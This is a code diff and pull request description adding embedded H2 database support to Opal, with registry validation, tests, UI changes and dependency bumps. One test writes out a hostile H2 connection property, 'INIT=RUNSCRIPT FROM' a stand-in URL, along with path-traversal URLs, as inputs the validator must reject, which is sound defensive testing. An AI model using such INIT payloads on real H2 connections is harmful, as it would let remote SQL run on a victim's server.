+    assertThat(table.getEntityType()).isEqualTo("Participant");
+    assertThat(table.getVariable("myvar").getValueType()).isEqualTo(TextType.get());
+  }
+
+  @Test
+  public void test_binary_value_round_trip_in_h2_storage() throws Exception {
+    JdbcDatasource datasource = createDatasource();
+
+    byte[] bytes = new byte[] { (byte) 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A };
+    VariableEntity entity = new VariableEntityBean("Participant", "1");
+    try(ValueTableWriter writer = datasource.createWriter("images", "Participant")) {
+      try(ValueTableWriter.VariableWriter variableWriter = writer.writeVariables()) {
+        variableWriter
+            .writeVariable(Variable.Builder.newVariable("myimage", BinaryType.get(), "Participant").build());
+      }
+      Variable variable = datasource.getValueTable("images").getVariable("myimage");
+      try(ValueTableWriter.ValueSetWriter valueSetWriter = writer.writeValueSet(entity)) {
+        valueSetWriter.writeValue(variable, BinaryType.get().valueOf(bytes));
+      }
+    }
+
+    ValueTable table = datasource.getValueTable("images");
+    Value value = table.getValue(table.getVariable("myimage"), table.getValueSet(entity));
+    assertThat((byte[]) value.getValue()).isEqualTo(bytes);
+  }
+
+  private JdbcDatasource createDatasource() throws Exception {
+    JdbcDatasource datasource = new JdbcDatasource("test", createDataSource(), JdbcDatasourceSettings //
+        .newSettings("Participant").useMetadataTables(true).multipleDatasources(true).build());
+    Initialisables.initialise(datasource);
+    return datasource;
+  }
+
+  private BasicDataSource createDataSource() throws Exception {
+    BasicDataSource dataSource = new BasicDataSource();
+    dataSource.setDriverClassName(H2DatabaseUrls.DRIVER_CLASS);
+    dataSource.setUrl(H2DatabaseUrls.expand("jdbc:h2:file:opal", temporaryFolder.newFolder("h2")));
+    dataSource.setUsername("sa");
+    dataSource.setPassword("password");
+    dataSource.setDefaultAutoCommit(false);
+    return dataSource;
+  }
+}

--- a/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
@@ -331,6 +331,34 @@ public class DefaultDatabaseRegistryTest extends AbstractOrientdbServiceTest {
   }
 
   @Test
+  public void test_h2_database_file_is_registered_once() {
+    databaseRegistry.create(createH2Database(Usage.STORAGE, "jdbc:h2:file:opal"));
+
+    for(String url : new String[] { "jdbc:h2:file:opal", "jdbc:h2:file:OPAL" }) {
+      Database duplicate = createH2Database(Usage.STORAGE, url);
+      duplicate.setName("another-" + url);
+      try {
+        databaseRegistry.create(duplicate);
+        fail("Expected an InvalidH2DatabaseException for URL: " + url);
+      } catch(InvalidH2DatabaseException ignored) {
+      }
+    }
+    assertThat(databaseRegistry.listSqlDatabases()).hasSize(1);
+  }
+
+  @Test
+  public void test_h2_database_can_be_updated_in_place() {
+    Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
+    databaseRegistry.create(database);
+
+    // the database is not a duplicate of itself
+    database.getSqlSettings().setUsername("opal");
+    databaseRegistry.update(database);
+
+    assertThat(databaseRegistry.getDatabase(database.getName()).getSqlSettings().getUsername()).isEqualTo("opal");
+  }
+
+  @Test
   public void test_h2_database_usage_is_validated_on_update() {
     Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
     databaseRegistry.create(database);

--- a/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
@@ -319,6 +319,18 @@ public class DefaultDatabaseRegistryTest extends AbstractOrientdbServiceTest {
   }
 
   @Test
+  public void test_h2_database_rejects_an_init_connection_property() {
+    Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
+    database.getSqlSettings().setProperties("INIT=RUNSCRIPT FROM 'https://elsewhere.example/payload.sql'");
+    try {
+      databaseRegistry.create(database);
+      fail("Expected an InvalidH2DatabaseException");
+    } catch(InvalidH2DatabaseException ignored) {
+    }
+    assertThat(databaseRegistry.listSqlDatabases()).isEmpty();
+  }
+
+  @Test
   public void test_h2_database_usage_is_validated_on_update() {
     Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
     databaseRegistry.create(database);

--- a/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
+++ b/opal-core/src/test/java/org/obiba/opal/core/service/DefaultDatabaseRegistryTest.java
@@ -25,6 +25,7 @@ import org.obiba.opal.core.runtime.jdbc.DataSourceFactory;
 import org.obiba.opal.core.service.database.CannotDeleteDatabaseLinkedToDatasourceException;
 import org.obiba.opal.core.service.database.DatabaseRegistry;
 import org.obiba.opal.core.service.database.IdentifiersDatabaseNotFoundException;
+import org.obiba.opal.core.service.database.InvalidH2DatabaseException;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
@@ -39,6 +40,7 @@ import java.util.List;
 import static com.google.common.collect.Lists.newArrayList;
 import static org.easymock.EasyMock.*;
 import static org.fest.assertions.api.Assertions.assertThat;
+import static org.fest.assertions.api.Assertions.fail;
 import static org.obiba.opal.core.domain.database.Database.Usage;
 
 @ContextConfiguration(classes = DefaultDatabaseRegistryTest.Config.class)
@@ -279,6 +281,65 @@ public class DefaultDatabaseRegistryTest extends AbstractOrientdbServiceTest {
     databaseRegistry.unregister(database.getName(), "jdbc-datasource");
 
     assertThat(databaseRegistry.hasDatasource(database)).isFalse();
+  }
+
+  @Test
+  public void test_new_h2_database() {
+    Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
+    databaseRegistry.create(database);
+
+    assertDatabaseEquals(database, databaseRegistry.getDatabase(database.getName()));
+    assertThat(databaseRegistry.listSqlDatabases()).hasSize(1);
+  }
+
+  @Test
+  public void test_h2_database_is_storage_only() {
+    for(Usage usage : new Usage[] { Usage.IMPORT, Usage.EXPORT }) {
+      Database database = createH2Database(usage, "jdbc:h2:file:opal");
+      try {
+        databaseRegistry.create(database);
+        fail("Expected an InvalidH2DatabaseException for usage: " + usage);
+      } catch(InvalidH2DatabaseException ignored) {
+      }
+    }
+    assertThat(databaseRegistry.listSqlDatabases()).isEmpty();
+  }
+
+  @Test
+  public void test_h2_database_url_must_be_a_name() {
+    for(String url : new String[] { "jdbc:h2:file:../escape", "jdbc:h2:file:/var/lib/opal", "jdbc:h2:mem:opal" }) {
+      Database database = createH2Database(Usage.STORAGE, url);
+      try {
+        databaseRegistry.create(database);
+        fail("Expected an InvalidH2DatabaseException for URL: " + url);
+      } catch(InvalidH2DatabaseException ignored) {
+      }
+    }
+    assertThat(databaseRegistry.listSqlDatabases()).isEmpty();
+  }
+
+  @Test
+  public void test_h2_database_usage_is_validated_on_update() {
+    Database database = createH2Database(Usage.STORAGE, "jdbc:h2:file:opal");
+    databaseRegistry.create(database);
+
+    database.setUsage(Usage.EXPORT);
+    try {
+      databaseRegistry.update(database);
+      fail("Expected an InvalidH2DatabaseException");
+    } catch(InvalidH2DatabaseException ignored) {
+    }
+    assertThat(databaseRegistry.getDatabase(database.getName()).getUsage()).isEqualTo(Usage.STORAGE);
+  }
+
+  private Database createH2Database(Usage usage, String url) {
+    return createDatabase().usage(usage).defaultStorage(false).sqlSettings(SqlSettings.Builder.create() //
+        .sqlSchema(SqlSettings.SqlSchema.JDBC) //
+        .driverClass("org.h2.Driver") //
+        .url(url) //
+        .username("sa") //
+        .password("password")) //
+        .build();
   }
 
   private Database createSqlDatabase() {

--- a/opal-ui/src/components/admin/databases/EditDatabaseDialog.vue
+++ b/opal-ui/src/components/admin/databases/EditDatabaseDialog.vue
@@ -46,7 +46,13 @@
             class="q-mb-md"
             @update:model-value="onDriverChange"
           />
-          <q-input v-model="database.sqlSettings.url" label="URL" dense class="q-mb-md" />
+          <q-input
+            v-model="database.sqlSettings.url"
+            label="URL"
+            :hint="selectedDriver?.jdbcUrlTemplate"
+            dense
+            class="q-mb-md"
+          />
           <q-form ref="formRef">
             <div class="row q-col-gutter-md q-mb-md">
               <div class="col">
@@ -197,15 +203,25 @@ const database = ref<DatabaseDto>(props.database || ({} as DatabaseDto));
 const jdbcDatasourceSettings = ref<JdbcDatasourceSettingsDto>({} as JdbcDatasourceSettingsDto);
 const editMode = ref<boolean>(false);
 const hasDatasource = ref<boolean>(false);
-let jdbcDrivers = [] as JdbcDriverDto[];
+const jdbcDrivers = ref([] as JdbcDriverDto[]);
 const driverOptions = ref([] as { label: string; value: string }[]);
 
 const hasUrl = computed(() => database.value.sqlSettings?.url || database.value.mongoDbSettings?.url);
-const usageOptions = [
-  { label: t('storage'), value: DatabaseDto_Usage.STORAGE },
-  { label: t('import'), value: DatabaseDto_Usage.IMPORT },
-  { label: t('export'), value: DatabaseDto_Usage.EXPORT },
-];
+
+const selectedDriver = computed(() =>
+  jdbcDrivers.value.find((driver) => driver.driverClass === database.value.sqlSettings?.driverClass),
+);
+
+// some drivers do not support every usage: H2 is embedded and can only be used for storage
+const usageOptions = computed(() => {
+  const options = [
+    { label: t('storage'), value: DatabaseDto_Usage.STORAGE },
+    { label: t('import'), value: DatabaseDto_Usage.IMPORT },
+    { label: t('export'), value: DatabaseDto_Usage.EXPORT },
+  ];
+  const supported = selectedDriver.value?.supportedUsages;
+  return supported?.length ? options.filter((option) => supported.includes(option.value)) : options;
+});
 
 const validateRequiredPassword = (value: string) => {
   if (database.value.sqlSettings) {
@@ -216,10 +232,10 @@ const validateRequiredPassword = (value: string) => {
 };
 
 function initializeJdbcDrivers() {
-  if (!jdbcDrivers.length) {
+  if (!jdbcDrivers.value.length) {
     systemStore.getJdbcDrivers().then((drivers) => {
-      jdbcDrivers = drivers;
-      (jdbcDrivers || []).forEach((driver: JdbcDriverDto) => {
+      jdbcDrivers.value = drivers || [];
+      jdbcDrivers.value.forEach((driver: JdbcDriverDto) => {
         driverOptions.value.push({ label: driver.driverName, value: driver.driverClass });
       });
     });
@@ -228,8 +244,11 @@ function initializeJdbcDrivers() {
 
 function onDriverChange(driverClass: string) {
   if (database.value.sqlSettings) {
-    const jdbcDriver: JdbcDriverDto | undefined = jdbcDrivers.find((d) => d.driverClass === driverClass);
+    const jdbcDriver: JdbcDriverDto | undefined = jdbcDrivers.value.find((d) => d.driverClass === driverClass);
     if (jdbcDriver) database.value.sqlSettings.url = jdbcDriver.jdbcUrlExample;
+    if (!usageOptions.value.some((option) => option.value === database.value.usage)) {
+      database.value.usage = usageOptions.value[0]?.value || DatabaseDto_Usage.STORAGE;
+    }
   }
 }
 
@@ -296,7 +315,7 @@ async function onSubmit() {
         onHide();
       })
       .catch((error) => {
-        notifyError(t('db.save_error', { error: error.response.data.message }));
+        notifyError(error);
       });
   }
 }

--- a/opal-ui/src/i18n/en/index.js
+++ b/opal-ui/src/i18n/en/index.js
@@ -95,7 +95,6 @@ export default {
     default_updated_column_hint: 'The column name for entity values last update date time, required for performing incremental imports. Make sure it will not conflict with a variable column name.',
     use_metadata_tables: 'With variables description tables',
     use_metadata_tables_hint: 'Export data dictionnaries to metadata tables.',
-    save_error: 'Error saving database',
   },
   clipboard: {
     copy: 'Copy to clipboard',
@@ -138,6 +137,7 @@ export default {
     PasswordTooWeak: 'Password is too weak',
     OldPasswordMismatch: 'Old password is invalid',
     IllegalArgument: 'Invalid data',
+    InvalidH2Database: 'Invalid H2 database',
     Conflict: 'Conflicting entry detected',
     BannedUser: 'Too many sign in failures, user {0} is banned for {1} seconds',
     InvalidCredentials: 'Invalid credentials, please try again',

--- a/opal-ui/src/i18n/fr/index.js
+++ b/opal-ui/src/i18n/fr/index.js
@@ -95,7 +95,6 @@ export default {
     default_updated_column_hint: "Le nom de la colonne contenant la date de mise à jour des entités, requis pour effectuer des imports incrémentaux. Assurez-vous qu'il ne sera pas en conflit avec un nom de variable.",
     use_metadata_tables: 'Avec les tables de variables',
     use_metadata_tables_hint: 'Exporter les dictionnaires de données dans les tables de méta-données.',
-    save_error: "Erreur lors de l'enregistrement de la base de données",
   },
   clipboard: {
     copy: 'Copier dans le presse-papiers',
@@ -138,6 +137,7 @@ export default {
     PasswordTooWeak: 'Mot de passe trop faible',
     OldPasswordMismatch: "L'ancien mot n'est pas valide",
     IllegalArgument: 'Données non valides',
+    InvalidH2Database: 'Base de données H2 non valide',
     Conflict: 'Conflit détecté',
     BannedUser: "Trop d'erreurs d'identification, l'utilisateur {0} est banni pour une durée de {1} secondes",
     InvalidCredentials: "Nom d'utilisateur ou mot de passe incorrect, veuillez réessayer",

--- a/opal-ui/src/models/Database.ts
+++ b/opal-ui/src/models/Database.ts
@@ -19,6 +19,8 @@ export interface JdbcDriverDto {
   /** e.g., "jdbc:mysql://localhost:3306/opal" */
   jdbcUrlExample: string;
   supportedSchemas: string[];
+  /** e.g., "STORAGE", see DatabaseDto.Usage */
+  supportedUsages: string[];
 }
 
 export interface DatabasesStatusDto {

--- a/opal-web-model/src/main/protobuf/Database.proto
+++ b/opal-web-model/src/main/protobuf/Database.proto
@@ -14,6 +14,7 @@ message JdbcDriverDto {
   optional string version = 4;
   required string jdbcUrlExample = 5; // e.g., "jdbc:mysql://localhost:3306/opal"
   repeated string supportedSchemas = 6;
+  repeated string supportedUsages = 7; // e.g., "STORAGE", see DatabaseDto.Usage
 }
 
 message DatabasesStatusDto {

--- a/pom.xml
+++ b/pom.xml
@@ -56,6 +56,7 @@
     <graalvm.version>25.3.4.1</graalvm.version>
     <gson.version>2.8.9</gson.version>
     <guava.version>33.6.0-jre</guava.version>
+    <h2.version>2.4.240</h2.version>
     <httpclient.version>5.6.3</httpclient.version>
     <jackson.version>2.22.1</jackson.version>
     <jackson-annotations.version>2.22</jackson-annotations.version>
@@ -76,7 +77,7 @@
     <jsr305.version>3.0.2</jsr305.version>
     <junit.version>4.13.2</junit.version>
     <kubernetes.version>7.2.0</kubernetes.version>
-    <liquibase.version>4.26.0</liquibase.version>
+    <liquibase.version>5.0.3</liquibase.version>
     <liquibase-slf4j.version>5.0.0</liquibase-slf4j.version>
     <lang-tag.version>1.7</lang-tag.version>
     <logback.version>1.6.0</logback.version>
@@ -84,7 +85,7 @@
     <opentelemetry.logback-appender.version>2.23.0-alpha</opentelemetry.logback-appender.version>
     <lucene.version>9.11.1</lucene.version>
     <public-datasources.version>1.2.0</public-datasources.version>
-    <magma.version>5.4.0</magma.version>
+    <magma.version>5.5-SNAPSHOT</magma.version>
     <mail.version>1.5.0-b01</mail.version>
     <mariadb-connector-java.version>3.5.9</mariadb-connector-java.version>
     <mockftpserver.version>2.6</mockftpserver.version>
@@ -662,6 +663,11 @@
       </dependency>
 
       <!-- If we need SQL drivers -->
+      <dependency>
+        <groupId>com.h2database</groupId>
+        <artifactId>h2</artifactId>
+        <version>${h2.version}</version>
+      </dependency>
       <dependency>
         <groupId>org.mariadb.jdbc</groupId>
         <artifactId>mariadb-java-client</artifactId>

--- a/pom.xml
+++ b/pom.xml
@@ -85,7 +85,7 @@
     <opentelemetry.logback-appender.version>2.23.0-alpha</opentelemetry.logback-appender.version>
     <lucene.version>9.11.1</lucene.version>
     <public-datasources.version>1.2.0</public-datasources.version>
-    <magma.version>5.5-SNAPSHOT</magma.version>
+    <magma.version>5.5.0</magma.version>
     <mail.version>1.5.0-b01</mail.version>
     <mariadb-connector-java.version>3.5.9</mariadb-connector-java.version>
     <mockftpserver.version>2.6</mockftpserver.version>


### PR DESCRIPTION
Magma 5.5 supports H2 as a JDBC datasource, so Opal can offer an embedded SQL database that needs no server to install or administer. Registering one is the same flow as any other SQL database, with the driver picked from the list.

H2 is embedded rather than reached over the network, which makes two things different from MySQL, MariaDB, PostgreSQL and SQL Server:

Where the file lives. The database is registered by name alone, as jdbc:h2:file:<name>, and that short form is what is persisted; DataSourceFactory expands it to ${OPAL_HOME}/data/h2/<name> when the connection is opened, creating the folder. Storing the name rather than the resolved path keeps the configuration portable if OPAL_HOME moves, and that is also the only site in the codebase that turns SQL settings into a connection, so the connection test resolves the same way. Restricting the URL to a plain name is what confines the databases to that folder: a path separator or a parent reference cannot be expressed, so there is nothing to escape with, and no canonical path comparison is needed to prove it.

What it can be used for. There is no pre-existing database to import from or export to, so H2 is storage only. DefaultDatabaseRegistry.persist enforces this and the URL rule, being the single point both POST /system/databases and PUT /system/database/{name} pass through. Identifiers databases are registered with storage usage, so H2 serves there too.

The dialog derives the offered usages from a new supportedUsages on JdbcDriverDto rather than naming the driver itself, so picking H2 leaves Storage alone and hides the JDBC datasource settings that only apply to import and export.

Liquibase moves to 5.0.3, the version Magma 5.5 is built against, so that Magma creates its metadata schema on the Liquibase that Opal ships rather than one it was never tested with. Opal has no Liquibase code of its own; liquibase-slf4j 5.0.0 stays, its OSGi range naming 4.x notwithstanding, as the two SPI types it implements are unchanged between the versions. H2 is pinned to 2.4.240 to match Magma, which means 1.x database files are unsupported: they are rejected on registration with a message to migrate rather than left to fail obscurely in the driver.

H2JdbcDatasourceTest covers the combination Opal ships rather than the one Magma tests, creating a table and round-tripping a binary value through a real H2 file.

Also fixes the save handler in the dialog reading error.response.data .message, which ClientErrorDto does not carry, against a db.save_error message that had no placeholder for it: a rejected registration reported nothing about why. It now goes through notifyError, which resolves the status and its arguments.